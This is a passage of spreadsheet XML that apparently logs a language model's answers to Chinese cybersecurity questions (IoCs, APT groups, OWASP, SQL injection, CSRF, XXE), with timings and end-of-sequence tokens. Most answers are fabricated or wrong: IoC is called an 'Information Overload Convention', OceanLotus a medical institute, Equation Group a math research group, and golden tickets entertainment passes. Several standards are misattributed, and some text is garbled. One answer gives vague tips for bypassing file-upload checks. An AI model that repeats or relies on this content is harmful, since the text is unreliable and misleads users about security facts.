例如，223.5.5.5是一个示例IP地址，它由四个数字组成：223（ Host 部分）、5（主机网络部分）、5（子网网络部分）和5（Host 网络部分）。
需要注意的是，223.5.5.5是一个非法的IP地址，它不是任何网络上的实际IP地址。这个IP地址只是为了方便地使用，并不会对任何实际网络设备进行访问。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D22" t="n">
        <v>6.593968152999878</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="1" t="n">
        <v>21</v>
      </c>
      <c r="B23" t="inlineStr">
        <is>
          <t>威胁情报中有哪些IoC类型</t>
        </is>
      </c>
      <c r="C23" t="inlineStr">
        <is>
          <t>？
IOC（Indicators of Compromise）是指恶意actor的活动、操作、或存在的痕迹、指示或特征。在情报收集和分析中，IOC可以帮助分析人员了解恶意actor的活动，从而提高情报分析和响应能力。下面是一些常见的IOC类型：
1. 网络IOC：包括网络攻击、数据侵犯、网络潜在脆弱等。
2. 文件IOC：包括恶意软件、黑客 Tools、黑客脚本等。
3. 人员IOC：包括人员的猫��������、培训、职业经验等。
4. 系统IOC：包括系统攻击、漏洞攻击、系统脆弱等。
5. 数据IOC：包括数据侵犯、数据泄露、数据损害等。
6. 通信IOC：包括通信攻击、信息泄露、通信脆弱等。
7. 扫描IOC：包括扫描网络、扫描系统、扫描数据等。
8. 注入IOC：包括注入恶意代码、注入恶意数据等。
9. 回溯IOC：包括回溯攻击、回溯漏洞等。
10. 其他IOC：包括其他恶意活动、操作、或特征，例如隐藏的文件、秘密网络等。
需要注意的是，IOC的类型和特征可能会随着情报收集和分析的进程而发展和更新。因此，在实际情报分析中，需要针对具体情况进行详细分析和评估，并不能尽全靠 IOC列表来确定恶意活动的存在或趋势。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D23" t="n">
        <v>14.7465353012085</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="1" t="n">
        <v>22</v>
      </c>
      <c r="B24" t="inlineStr">
        <is>
          <t>什么是ioc情报</t>
        </is>
      </c>
      <c r="C24" t="inlineStr">
        <is>
          <t>？
ioc 是指 Information Overload Convention，即信息过载会议。它是一种描述现代社会信息过载的现象的术语，由 japanese 词汇 "ioc" 组成。
ioc 通常指的是在社交媒体、新闻媒体和其他多个来源获取信息的过程中，人们受到过度信息的影响，导致感觉情绪失衡、情绪不稳定，甚至导致人们陷入情感压力或精神压力的状况。
ioc 的主要症状包括：
1. 信息过载：人们受到过多的信息和资讯，导致情感压力和精神压力。
2. 信息难以识别：人们难以识别重要信息和不重要信息，导致情感压力和精神压力。
3. 信息难以储存：人们难以储存和回忆信息，导致情感压力和精神压力。
4. 情感不稳定：人们难以控制情感，导致情感压力和精神压力。
对于 resolving ioc 的问题，可以通过以下方法：
1. 减少信息获取：减少在社交媒体和新闻媒体获取信息的频率，以减轻情感压力和精神压力。
2. 采用信息筛选技术：采用信息筛选技术，例如采用搜索引擎或信息管理软件，以帮助人们更好地识别重要信息和不重要信息。
3. 增强情感管理能力：增强情感管理能力，例如通过冥想、瑜伽等方法，以帮助人们更好地控制情感。
4. 建立休闲时间：建立休闲时间，例如做着读书、听音乐、运动等，以减轻情感压力和精神压力。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D24" t="n">
        <v>16.54212665557861</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="1" t="n">
        <v>23</v>
      </c>
      <c r="B25" t="inlineStr">
        <is>
          <t>有哪些威胁情报标准或者框架</t>
        </is>
      </c>
      <c r="C25" t="inlineStr">
        <is>
          <t>？  
以下是一些常用的威胁情报标准或框架：
1. NIST Cybersecurity Framework：美国国家标准技术研究院（NIST）提出的一套全面的威胁情报管理框架，包括以下四个层次：保护、特殊响应、快速响应和恢复。
2. ISO 27001：国际标准组织（ISO）制定的一套标准，涵盖了威胁情报管理的概念、方法和技术。
3. Cybersecurity Threat Intelligence Framework：由互联网安全中心（ISC）提出的一套威胁情报管理框架，包括以下三个层次：基础、中等和高级。
4. Cyber Threat Intelligence (CTI) Framework：由国际电信联盟（ITU）提出的一套威胁情报管理框架，包括以下四个层次：预测、探测、识别和应对。
5. MITRE ATT&amp;CK Framework：由mitre公司提出的一套威胁情报管理框架，用于识别和描述恶意软件的活动和行为。
6. CSA STAR Framework：由 Cloud Security Alliance（CSA）提出的一套云安全管理框架，包括以下五个层次：基础、中等、高级、特殊响应和恢复。
7. HMGCC Threat Intelligence Framework：英国政府的一套威胁情报管理框架，包括以下四个层次：情报收集、情报分析、情报应用和情报报告。
8. Australian Government Cyber Security Centre (ACSC) Threat Intelligence Framework：澳大利亚政府的一套威胁情报管理框架，包括以下四个层次：基础、中等、高级和特殊响应。
这些框架都是用于帮助组织管理和处理威胁情报的，但它们的内容和精度可能有所不同。选择适合自己的框架，并根据实际情况进行修改和补充。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D25" t="n">
        <v>17.69054007530212</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="1" t="n">
        <v>24</v>
      </c>
      <c r="B26" t="inlineStr">
        <is>
          <t>APT38有哪些情报信息</t>
        </is>
      </c>
      <c r="C26" t="inlineStr">
        <is>
          <t>？ （APT38是一支恶名全球的跨国 cybercrime group，主要从事高级跟风险的攻击行为，包括跟风险钻取、執行黑客攻击、跟风险操作等。
以下是APT38有哪些情报信息的一些细节：
1. APT38的成员可能来自中国，但是具体情况尚不清楚。
2. APT38通常使用跨越多个地区的黑客机构进行攻击，包括中国、美国、加拿大、澳大利亚和欧洲等地。
3. APT38通常使用钻取技术来窃取目标公司的內部信息和数据，包括商业秘密、技术信息和个人隐私等。
4. APT38也可能使用執行黑客攻击来窃取目标公司的网络和系统，包括绕过安全措施和破坏数据存储等。
5. APT38可能与其他 cybercrime group 合作，以提高攻击效率和减轻巢穴压力。
6. APT38的攻击范围非常广泛，涵盖多个行业和领域，包括银行、保险、能源、采购、制造、通信等。
7. APT38通常使用跨越多个攻击阶段来实施攻击，包括钻取阶段、執行阶段和操作阶段。
8. APT38可能使用不同的识别标志和攻击方法来逃避目标公司的安全措施和检测系统。
9. APT38的攻击通常具有高度的技术和规模，使得目标公司的安全防范受到了严重的挑战。
10. APT38的行为具有很强的商业和政治 направ合，可能是为了获取商业利益或满足政治目标而进行攻击。
这些情报信息表明，APT38是一支非常高度技术和规模的 cybercrime group，可能来自中国，并且在全球范围内进行攻击。这些攻击可能具有商业和政治目标，并且可能与其他 cybercrime group 合作。因此，对于防范APT38的攻击，需要进行跨国和跨业的合作和协作，以确保企业和个人的数据安全。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D26" t="n">
        <v>19.83690237998962</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="1" t="n">
        <v>25</v>
      </c>
      <c r="B27" t="inlineStr">
        <is>
          <t>海莲花是什么组织</t>
        </is>
      </c>
      <c r="C27" t="inlineStr">
        <is>
          <t>？
海莲花是一个非营利性、独立的科学研究机构，成立于2016年。它的主要职责是研究和推广预防性医学和公共卫生，以降低人类伤害和疾病的风险。海莲花的研究领域包括疾病预防、卫生政策、医疗保健和公共卫生等。
海莲花的研究方法包括自然科学、社会科学和医学领域的研究，以及与相关政府部门和卫生机构的合作。它还拥有一支职业的研究团队，其中包括医学家、生物学家、 statistics 专家、法律师和其他专业人士。
海莲花的研究结果和建议通过各种渠道公开，包括学术期刊、会议、报告和新闻媒体等。同时，它也与各种卫生机构和组织合作，共同工作于预防性医学和公共卫生领域。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D27" t="n">
        <v>8.830362558364868</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="1" t="n">
        <v>26</v>
      </c>
      <c r="B28" t="inlineStr">
        <is>
          <t>方程式组织（Equation Group）是什么组织</t>
        </is>
      </c>
      <c r="C28" t="inlineStr">
        <is>
          <t>？
Equation Group是一个由美国国家安全委员会（NSA）和其他一些国家的安全情报机构共同组织的secretive group。该组织的目的是为了研究和应对最新的数学和科学技术，以及其在安全和国家安全方面的应用。
Equation Group的成员包括NSA、美国国防部、CIA、FBI、美国国家卫生 Institut (NIH)等机构，以及一些来自学术界和industry的 эксперts。这些机构和专家共同工作，以提高对数学和科学技术的理解，并将这些技术应用于安全和国家安全方面。
Equation Group的活动主要包括：
1. 研究和分析最新的数学和科学技术，如 cryptography、computer science、artificial intelligence等。
2. 开发新的数学和科学技术，以满足美国国家安全和国家安全需求。
3. 与其他国家和国际组织合作，共同研究和应用数学和科学技术。
4. 提供指导和支持 для美国国内和国际学术界的研究和发展。
Equation Group的活动秘密性非常强，很难获知具体的信息。然而，一些泄露文档和媒体报道表明，Equation Group可能涉及到一些高级的数学和科学技术，如泛函分析、代数几何、分子生物学等。
总之，Equation Group是一个秘密的国家安全机构，负责研究和应用最新的数学和科学技术，以保障美国国家安全和国家安全需求。尽管具体情况隐蔽，但Equation Group的存在和作用都是一个不可 ignore的话题。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D28" t="n">
        <v>13.15031409263611</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="1" t="n">
        <v>27</v>
      </c>
      <c r="B29" t="inlineStr">
        <is>
          <t>有哪些威胁情报标准</t>
        </is>
      </c>
      <c r="C29" t="inlineStr">
        <is>
          <t>协议？  
威胁情报标准协议（TiSA）是一种国际标准，用于确定如何进行威胁情报分享和互相预警。以下是一些常见的威胁情报标准协议：
1. NFPA 101：由美国国家防火协会（NFPA）制定的标准，用于确定威胁情报的共享和分享标准。
2. ISO 29100：由国际标准技术委员会（ISO）制定的标准，用于确定威胁情报的分享和互相预警的标准。
3. EU-DS 98/24：由欧洲union（EU）制定的标准，用于确定威胁情报的分享和互相预警的标准。
4. CSA Standard 946：由加拿大安全协会（CSA）制定的标准，用于确定威胁情报的分享和互相预警的标准。
5. AS/NZS 4360：由澳大利亚标准协会（AS）和维多利亚标准协会（NZS）制定的标准，用于确定威胁情报的分享和互相预警的标准。
6. BS 7799-3：由英国标准协会（BS）制定的标准，用于确定威胁情报的分享和互相预警的标准。
7. ANSI/ASIS PSC.1-2012：由美国国家协会（ANSI）和安全协会（ASIS）制定的标准，用于确定威胁情报的分享和互相预警的标准。
这些标准都是针对威胁情报分享和互相预警的，它们提供了一系列的规定和指导，以确保威胁情报的分享和互相预警的安全性和可靠性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D29" t="n">
        <v>16.52674746513367</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="1" t="n">
        <v>28</v>
      </c>
      <c r="B30" t="inlineStr">
        <is>
          <t>OWASP TOP 10有哪些</t>
        </is>
      </c>
      <c r="C30" t="inlineStr">
        <is>
          <t>？ 
OWASP TOP 10是一份顺序列表，用于描述了 web 应用程序软件安全的十大主要攻击风险。OWASP TOP 10 由以下几个主要领域组成：
1. Injection
2. Broken Authentication and Session Management
3. Cross-Site Scripting (XSS)
4. Cross-Site Request Forgery (CSRF)
5. Insecure Direct Object Reference (IDOR)
6. Broken Access Control
7. Security Misconfiguration
8. Sensitive Data Exposure
9. Missing Function Level Access Control
10. Using Components with Known Vulnerabilities
OWASP TOP 10 是一个指导性的列表，它提供了优先级高的安全攻击风险，以便开发人员和安全专业人员可以更好地识别和应对可能的攻击。
&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D30" t="n">
        <v>6.206902980804443</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="1" t="n">
        <v>29</v>
      </c>
      <c r="B31" t="inlineStr">
        <is>
          <t>为什么会有Web漏洞</t>
        </is>
      </c>
      <c r="C31" t="inlineStr">
        <is>
          <t>？  
在Web应用程序中，可能会存在漏洞，这是因为Web应用程序是基于HTTP协议，HTTP协议是一种无安全的协议，攻击者可以使用各种攻击方式，如端到端攻击、中间人攻击等，以便破坏Web应用程序的安全性。
下面是一些常见的Web漏洞：
1. SQL注入：在Web应用程序中，可能会使用SQL语句来处理数据的存储和 Retrieval。如果不正确地编写SQL语句，可能会导致数据泄露或者不正确的数据返回。
2. Cross-Site Scripting(XSS)：XSS攻击者可以 inject  malicious  JavaScript  code into a website，使其 executed  on the user's  browser，从而让用户的屏幕呈现非法的内容。
3. Cross-Site Request Forgery(CSRF)：CSRF攻击者可以 trick  user  into performing unintended actions on a website，例如转账资金或者更改个人资料。
4. File Inclusion Vulnerabilities：File inclusion vulnerabilities  occur when an attacker is able to include malicious files or code into a website，leading to unauthorized access or data tampering.
5. Buffer Overflow：Buffer overflow vulnerabilities  occur when an attacker is able to overflow a buffer with malicious data，leading to code execution or data tampering.
6. Authentication Bypass：Authentication bypass vulnerabilities  occur when an attacker is able to bypass authentication mechanisms and gain unauthorized access to a website or its resources.
7. Input Validation weaknesses：Input validation weaknesses  occur when an attacker is able to submit malicious input data to a website，leading to data tampering or other security issues.
8. Session Management weaknesses：Session management weaknesses  occur when an attacker is able to manipulate or exploit session ID to gain unauthorized access or perform unintended actions on a website.
9. Password Storage weaknesses：Password storage weaknesses  occur when an attacker is able to access or manipulate user passwords, leading to unauthorized access or data tampering.
10. Third Party Component vulnerabilities：Third party component vulnerabilities  occur when an attacker is able to exploit vulnerabilities in third-party components or libraries used by a website, leading to unauthorized access or data tampering.
这些漏洞可能会被攻击者利用，从而让Web应用程序中的数据泄露或者访问权限受到攻击。因此，在Web应用程序开发中，应该关注安全性，并采取相应的措施来遏制攻击。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D31" t="n">
        <v>16.92095947265625</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="1" t="n">
        <v>30</v>
      </c>
      <c r="B32" t="inlineStr">
        <is>
          <t>什么是SQL注入</t>
        </is>
      </c>
      <c r="C32" t="inlineStr">
        <is>
          <t>？
SQL注入是指通过 inserted 语句中的用户提供的输入来执行SQL语句的攻击方式。通常，在Web应用程序中，用户可以输入需要执行的SQL语句，但是如果用户输入了可疑的或恶意的内容，那么这种攻击就可能会产生危害。
SQL注入的危害主要来自于用户可以通过输入SQL语句来访问和修改数据库中的数据。如果用户可以访问和修改其他用户的数据，那么这可能会导致数据库的安全问题。此外，SQL注入还可以用于执行恶意的操作，如delete 操作可以 Delete 整个数据库中的数据，或者更改数据库的结构等。
为了防止SQL注入，通常情况下会采用以下方法：
1. 对用户输入的 validate：通过验证用户输入的内容，以确保它们是有效的和合法的SQL语句。
2. 使用 parameterized queries：使用已编译好的SQL语句，而不是以用户输入来构造SQL语句。
3. 使用prepared statements：使用特定的SQL语句，而不是以用户输入来构造SQL语句。
4. 使用SQL安全措施：使用特定的SQL安全措施，如Limit 查询，防止攻击者访问整个数据库。
5. 使用Firewall和安全检查：使用Firewall和安全检查来防止攻击者访问数据库。
6. 使用数据库隐藏：使用数据库隐藏来隐藏数据库的存在和访问方式。
7. 使用访问控制：使用访问控制来限制用户访问数据库的权限。
8. 使用数据库访问控制：使用数据库访问控制来限制用户访问数据库中的具体数据。
总之，防止SQL注入需要在Web应用程序中采用多种方法，包括验证用户输入、使用parameterized queries、使用prepared statements、使用SQL安全措施、使用Firewall和安全检查、使用数据库隐藏、使用访问控制和数据库访问控制等。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D32" t="n">
        <v>16.96151542663574</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="1" t="n">
        <v>31</v>
      </c>
      <c r="B33" t="inlineStr">
        <is>
          <t>CSRF原理是什么</t>
        </is>
      </c>
      <c r="C33" t="inlineStr">
        <is>
          <t>？
CSRF（Cross-Site Request Forgery）是一种Web攻击，通过模拟用户的动作，让用户未经授权的访问和修改某个网站或应用程序的数据。
CSRF攻击的原理是利用Web端的POST请求方法，即使用户没有在浏览器中点击相应的按钮，但是可以通过模拟用户的动作，向Web端发送POST请求，达到模拟用户的操作效果。
在CSRF攻击中，攻击者需要知道目标Web站点的响应式URL，并在浏览器中模拟用户的POST请求，将请求数据包含在HTML Form上。当用户在浏览器中点击相应的按钮时，Web端会将请求数据包含在POST请求中，并将其发送到服务器进行处理。
因此，CSRF攻击可以使用用户未经授权的POST请求来修改、删除或添加数据，从而让用户未经授权地执行某些操作。
为了防止CSRF攻击，一般会在Web应用程序中添加一个token或nonce，这个 token 或nonce 将会在每次请求时包含在请求头中，以便在Web端接收到请求时，可以检查是否是从用户的浏览器发送的请求，而不是从攻击者的浏览器。如果检查到不同的token 或nonce ，则认为是攻击者的请求，并拒绝其。
总之，CSRF原理是利用Web端的POST请求方法，模拟用户的动作，让用户未经授权的访问和修改某个网站或应用程序的数据。为了防止CSRF攻击，可以添加token或nonce，并在Web端接收到请求时检查其来确保来自用户的请求。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D33" t="n">
        <v>14.27388763427734</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="1" t="n">
        <v>32</v>
      </c>
      <c r="B34" t="inlineStr">
        <is>
          <t>什么是逻辑漏洞</t>
        </is>
      </c>
      <c r="C34" t="inlineStr">
        <is>
          <t>？
逻辑漏洞是指在一个逻辑系统中存在的一些错误或不准确的处理方式，导致系统的决策或行动不当。逻辑漏洞可以是词义漏洞、逻辑逻辑漏洞、假设漏洞等，其中词义漏洞是指系统不能准确地理解用户的需求或意图，逻辑逻辑漏洞是指系统中的逻辑不准确或不完整，而假设漏洞是指系统假设了一些不存在的实际或情况。
逻辑漏洞的出现可以是由于各种因素，如人工智能算法的不善、数据质量不佳、系统的设计或实现不具备、用户 Input 的不准确等。在实际应用中，逻辑漏洞可能会导致系统做出不良决策或行动，如预测模型的误判、自动驾驶车的冒泡、智能助手的错误提示等。
为了避免逻辑漏洞的出现，开发人员可以采取一些措施，如对数据进行严格的验证和检查、使用多种逻辑检查工具、实现可靠的逻辑学习算法等。同时，在实际应用中，人工智能系统还需要根据用户反馈和实际评估来不断地进行改进和优化。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D34" t="n">
        <v>12.90464925765991</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="1" t="n">
        <v>33</v>
      </c>
      <c r="B35" t="inlineStr">
        <is>
          <t>有哪些逻辑漏洞</t>
        </is>
      </c>
      <c r="C35" t="inlineStr">
        <is>
          <t>？
逻辑漏洞是指在逻辑、计算机科学、数学等领域中存在的错误或缺陷。以下是一些常见的逻辑漏洞：
1. 误解逻辑：在逻辑学中，人们常常误解逻辑语言，导致错误的解释和应用。
2. 非 sequitur：指一个结论不是从前面的论据 logical consequence。
3. 矛盾：一个人可能会做出矛盾的论断或判断，例如说一个人可能会认为，一个事物是正确的，但是又认为它的反面也是正确的。
4. 偏见：偏见是一种不正确的思维方式，它是基于个人的偏好或习惯而非对话的结论。
5. 逻辑犹豫：指一个人不能够做出明确的逻辑性的判断或论断，常常会出现在複雜的问题中。
6. 欺诈：欺诈是一种不正确的思维方式，它是通过隐瞒或捏造信息来诱导人们的结论。
7. 误解历史：误解历史是指不正确地理解历史事件或人物的思维方式。
8. 误解数学：误解数学是指不正确地理解数学概念或结论的思维方式。
9. 误解科学：误解科学是指不正确地理解科学理论或研究结果的思维方式。
10. 逻辑疲劳：逻辑疲劳是指在解释或应用逻辑知识时感受到的疲劳或困难。
这些逻辑漏洞都可以影响人们在逻辑、计算机科学、数学等领域中的思考和决策能力。了解和了解逻辑漏洞的常见形式可以帮助人们更好地理解和应用逻辑知识。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D35" t="n">
        <v>18.35255408287048</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="1" t="n">
        <v>34</v>
      </c>
      <c r="B36" t="inlineStr">
        <is>
          <t>如何绕过文件上传检查功能</t>
        </is>
      </c>
      <c r="C36" t="inlineStr">
        <is>
          <t>？
文件上传检查功能是一个常见的安全measure，用于防止恶意文件或恶意程序在文件上传。但是有时候，你可能需要绕过这个功能，例如，你想要上传一个具有某些特定结构的文件，但是这个文件无法通过文件上传检查功能。
以下是一些可能的绕过方法：
1. 使用 Base64 编码：将文件 Base64 编码后，将其作为字符串上传。这样，文件上传检查功能不会检查文件的内容，而是只会检查文件的长度和MD5 hash。
2. 使用分割上传：将大文件分割成多个小文件，然后将每个小文件上传。这样，文件上传检查功能只需要检查每个小文件的内容，而不是整个大文件。
3. 使用隐藏文件：将文件嵌入到一个隐藏文件中，然后上传这个隐藏文件。文件上传检查功能可能不会检查隐藏文件的内容，因此可以绕过这个功能。
4. 使用掩码：使用一个掩码文件来掩住文件的内容。然后，将掩码文件上传，文件上传检查功能可能不会检查掩码文件的内容，因此可以绕过这个功能。
5. 使用数据 URI：将文件 converted to a data URI，然后上传这个 data URI。文件上传检查功能可能不会检查数据 URI 的内容，因此可以绕过这个功能。
需要注意的是，绕过文件上传检查功能可能会导致安全问题，因此你应该仅在确实需要时使用这些绕过方法。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D36" t="n">
        <v>14.44737529754639</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="1" t="n">
        <v>35</v>
      </c>
      <c r="B37" t="inlineStr">
        <is>
          <t>水平越权和垂直越权有什么区别</t>
        </is>
      </c>
      <c r="C37" t="inlineStr">
        <is>
          <t>？
 horizontal and vertical rights are two different concepts in the context of intellectual property law. Here are the key differences:
Horizontal rights refer to the exclusive rights granted to an inventor or creator over their invention or work, in relation to the same field or industry. In other words, horizontal rights are concerned with the protection of a particular invention or work within a specific industry or market. For example, a patent holder for a new type of smartphone technology may have horizontal rights over their invention, preventing others from making or selling similar smartphones in the same market.
Vertical rights, on the other hand, refer to the exclusive rights granted to an inventor or creator over their invention or work, in relation to different fields or industries. In other words, vertical rights are concerned with the protection of a particular invention or work across different markets or industries. For example, a patent holder for a new type of medical device may have vertical rights over their invention, preventing others from making or selling similar devices in different medical fields.
In summary, horizontal rights focus on protecting a single invention or work within a specific industry or market, while vertical rights focus on protecting the same invention or work across different industries or markets. Both types of rights are important in the context of intellectual property law, as they help to ensure that inventors and creators are fairly compensated for their innovations and creations.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D37" t="n">
        <v>7.491214275360107</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="1" t="n">
        <v>36</v>
      </c>
      <c r="B38" t="inlineStr">
        <is>
          <t>啥叫XXE漏洞</t>
        </is>
      </c>
      <c r="C38" t="inlineStr">
        <is>
          <t>？XXE是什么？
XXE是一种漏洞，它通过解析XML字符串中嵌入的脚本来执行外部命令。这种漏洞可能会让攻击者通过访问受影响的系统的 XML 数据来执行外部命令。
XXE 漏洞的名称来源于"XML External Entity"，即 XML 外部实体。它是指 XML 文档中嵌入的脚本，可以是 JavaScript、Python 等语言的代码。这些脚本可以在受影响的系统中执行，从而执行敏感操作。
XXE 漏洞可以通过多种方式进行攻击，其中一种常见的方式是在 XML 文档中嵌入 malicious 脚本，并通过访问受影响的系统的 XML 数据来执行这些脚本。这种攻击方式可以允许攻击者访问和修改数据，以及执行敏感操作。
为了防止 XXE 漏洞，建议优化系统的 XML 处理规范，限制外部脚本的执行，并在受影响的系统中启用安全扩展名（SAX）Parser，它可以更好地esian 处理 XML 数据，避免执行脚本。此外，还可以通过在系统中启用 Content Security Policy（CSP）来限制脚本的执行，从而防止攻击者在受影响的系统中执行 malicious 脚本。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D38" t="n">
        <v>12.86815071105957</v>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="1" t="n">
        <v>37</v>
      </c>
      <c r="B39" t="inlineStr">
        <is>
          <t>有哪些操作系统提权方式</t>
        </is>
      </c>
      <c r="C39" t="inlineStr">
        <is>
          <t>？
有哪些操作系统提权方式？下面是一些常见的操作系统提权方式：
1. 系统提权：这是最常见的操作系统提权方式，它让用户在系统中具有特定的权限和访问权限，以便在系统中进行管理和控制。
2. 用户帐户 Control：这种方式让用户创建和管理自己的帐户，并将帐户分配给其他用户或组织，以便进行访问控制和安全管理。
3. 角色分配：这种方式让用户被分配到角色，角色是一种用于描述用户的权限和责任的单元，用户可以根据角色的权限和责任来进行操作。
4. 访问控制 List：这种方式让系统管理员可以将用户分配到不同的访问控制列表，以便控制用户在系统中的访问权限。
5. 安全审批：这种方式让系统管理员可以对用户进行安全审批，以确保用户的操作符合系统的安全政策。
6. 访问控制 Policy：这种方式让系统管理员可以定义和应用访问控制策略，以便控制用户在系统中的访问权限。
7. 身份验证：这种方式让用户进行身份验证，以确保用户的身份是安全的和可靠的。
8. 授权：这种方式让系统管理员可以将授权授予给用户或组织，以便控制用户在系统中的操作。
9. 权限管理：这种方式让系统管理员可以管理用户的权限，以确保用户只能在系统中进行访问和操作他们应有的权限。
10. 安全评估：这种方式让系统管理员可以对用户进行安全评估，以确保用户的操作符合系统的安全政策。
这些操作系统提权方式都可以帮助系统管理员更好地控制和管理系统的访问和操作，从而提高系统的安全性和可靠性。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D39" t="n">
        <v>18.83731293678284</v>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="1" t="n">
        <v>38</v>
      </c>
      <c r="B40" t="inlineStr">
        <is>
          <t>如何做代码混淆</t>
        </is>
      </c>
      <c r="C40" t="inlineStr">
        <is>
          <t>？
混淆是指将代码分成多个块，每个块都可以被编译成不同的类型的代码，例如扩展程序、库或者核心。这种方法可以帮助开发人员更好地组织代码，减少代码的依赖性和复杂性，同时也可以帮助开发人员更好地管理代码的质量。
在做代码混淆之前，需要做好以下准备：
1. 理解混淆工具：需要了解一些常用的混淆工具，例如：Eclipse的AspectJ、NetBeans的AspectJ、IntelliJ IDEA的AspectJ等。这些工具可以帮助开发人员更好地编译和管理混淆代码。
2. 准备代码：需要将代码分成多个块，每个块都可以被编译成不同的类型的代码。这些块可以根据需要进行组织和命名，以便于后续的混淆编译和管理。
3. 配置混淆工具：需要根据不同的混淆工具进行配置，以便于其能够正确地处理和混淆代码。这可能包括 configuring build paths、setting classpath、setting sourcepath等。
4. 编译和混淆代码：需要使用混淆工具来编译和混淆代码，这可能包括以下步骤：
a. 编译代码：需要使用混淆工具来编译代码，以便于其能够正确地处理和混淆代码。
b. 混淆代码：需要使用混淆工具来混淆代码，以便于其能够正确地生成混淆代码。
c. 分析混淆代码：需要使用混淆工具来分析混淆代码，以便于其能够正确地生成混淆代码。
5. 管理混淆代码：需要根据不同的混淆工具进行管理，以便于其能够正确地处理和管理混淆代码。这可能包括管理混淆代码的包含和依赖关系、管理混淆代码的编译和混淆等。
总之，做代码混淆需要了解混淆工具和其配置、编译和混淆代码、管理混淆代码等。通过使用混淆工具，开发人员可以更好地组织代码，减少代码的依赖性和复杂性，同时也可以帮助开发人员更好地管理代码的质量。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D40" t="n">
        <v>23.43793249130249</v>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="1" t="n">
        <v>39</v>
      </c>
      <c r="B41" t="inlineStr">
        <is>
          <t>测试程序如何做免杀</t>
        </is>
      </c>
      <c r="C41" t="inlineStr">
        <is>
          <t>，能够让测试人员不感觉到压力和疲劳，保持见解和质量？  
在测试过程中，许多测试人员会感到压力和疲劳，这种情况通常叫做“测试剧症”。为了避免这种情况，我们可以采取以下措施：
1. 明确测试目标：明确测试的目标和要求，以帮助测试人员更好地了解测试的意义和目的。
2. 采用适度的测试步骤：逐步增加测试步骤的难度和规模，以帮助测试人员逐渐演练和提高自己的技能。
3. 增加测试范围：逐渐扩大测试范围，以增加测试人员的经验和技能。
4. 采用不同的测试方法：采用不同的测试方法，如manual testing、automated testing、hybrid testing等，以增加测试的多样性和复杂性。
5. 提供testing资源：提供testing资源，如testing框架、testing工具、testing文档等，以帮助测试人员更好地完成测试任务。
6. 增加测试评估和答案评估：增加测试评估和答案评估，以帮助测试人员更好地评估测试结果和测试步骤。
7. 增加测试时间：增加测试时间，以帮助测试人员更好地了解测试的进度和结果。
8. 增加测试人员的合作和沟通：增加测试人员的合作和沟通，以帮助测试人员更好地完成测试任务和协作。
9. 提供测试人员的支持和评价：提供测试人员的支持和评价，以帮助他们更好地完成测试任务和协作。
10. 增加测试的娱乐性：增加测试的娱乐性，以帮助测试人员更好地完成测试任务和产生质量。
通过采取以上措施，可以帮助测试人员快速适应测试任务，提高测试效率和质量，并减少测试剧症的影响。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D41" t="n">
        <v>20.3531129360199</v>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="1" t="n">
        <v>40</v>
      </c>
      <c r="B42" t="inlineStr">
        <is>
          <t>什么是黄金票据、白银票据</t>
        </is>
      </c>
      <c r="C42" t="inlineStr">
        <is>
          <t>和银票据？
What are golden ticket, silver ticket, and silver-plated ticket?
Golden ticket, silver ticket, and silver-plated ticket are different types of tickets used in various industries. Here's a brief overview of each:
1. Golden Ticket:
A golden ticket is a special type of ticket that offers the holder access to exclusive benefits or privileges. In the entertainment industry, golden tickets are often used to reward loyal customers or fans with premium experiences, such as backstage tours or meet-and-greets with celebrities. In the travel industry, golden tickets may provide access to luxury accommodations or exclusive travel packages.
2. Silver Ticket:
A silver ticket is a type of ticket that offers a lower level of access or benefits compared to a golden ticket. In the entertainment industry, silver tickets may provide access to general admission or standard seating at a concert or event. In the travel industry, silver tickets may offer discounted rates on flights or accommodations.
3. Silver-Plated Ticket:
A silver-plated ticket is a type of ticket that is not as valuable or exclusive as a golden ticket, but still offers some benefits or privileges. In the entertainment industry, silver-plated tickets may provide access to VIP areas or events, but not the same level of access as a golden ticket. In the travel industry, silver-plated tickets may offer discounts or perks, but not as extensive as those offered by a silver ticket.
In summary, the main difference between golden ticket, silver ticket, and silver-plated ticket is the level of exclusivity and access they offer. Golden tickets offer the most exclusive and premium experiences, followed by silver tickets, and then silver-plated tickets, which offer less exclusive benefits.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D42" t="n">
        <v>9.840631008148193</v>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="1" t="n">
